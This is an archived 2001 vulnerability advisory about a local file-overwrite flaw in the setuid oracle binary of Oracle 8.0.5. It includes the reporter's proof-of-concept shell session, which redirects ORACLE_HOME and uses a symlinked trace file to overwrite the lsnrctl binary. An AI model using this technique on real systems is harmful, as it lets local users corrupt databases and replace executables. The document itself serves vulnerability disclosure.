Oracle Database Permission Configuration Error Lets Local Users Modify Database Files, Configuration Files, and Executables
|
Date: Aug 3 2001
|
Impact: Modification of user information
|
Version(s): Oracle 8.0.5
|
Description: PlazaSite reported a vulnerability in Oracle 8.0.5 that allows any local user to modify any file owned by the 'oracle' user.
It is reported that there is a write permision checking error in an unspecified component of Oracle that allows any local user to write to any file owned by the 'oracle' user.
|
Impact: A local user can modify and corrupt the database and modify the oracle binaries.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: otn.oracle.com/deploy/security/alerts.htm (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), UNIX (Tru64)
|
Reported By: Juan Manuel Pascual Escriba <pask@plazasite.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Thu, 02 Aug 2001 09:57:26 +0200
From: Juan Manuel Pascual Escriba <pask@plazasite.com>
Subject: vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6
|
--------------6B84FF8612CCC30679044832
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
WWW.PLAZASITE.COM
System & Security Division
Title: Vulnerability in oracle binary in Oracle 8.0.5
Date: 11-12-2000
Platform: Only tested in Linux, but can be "exported" to others.
Impact: Any user compromise any file owned by oracle (DDBB owner).
Author: Juan Manuel Pascual (pask@plazasite.com)
Status: Vendor Contacted at 18th July 2001
PROBLEM SUMMARY:
There is a write permision checking error in oracle binary that can
be used by local
users to write any file owned by oracle.
IMPACT:
Any user with local access, can corrupt the database. Overwrite
oracle binaries, etc.
SOLUTION:
Chmod -s ;-)))).
STATUS:
Vendor was contacted .
----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@plazasite.com
--------------6B84FF8612CCC30679044832
Content-Type: text/plain; charset=us-ascii;
name="oracle-8.0.5.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="oracle-8.0.5.txt"
Only for educational purposes. (corrupt a ddbb isnt an educational purpose!)
[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x 2 pask pask 4096 dic 14 02:33 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x 2 pask pask 4096 dic 14 02:35 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
-rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc
Upsssssssss a log owned by oracle with the structure ora_pid.trc
I can create:
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
..
...
until the log will be my link .. and i overwrite the binary. what about dbf files and go on ....
--------------6B84FF8612CCC30679044832--
|
|
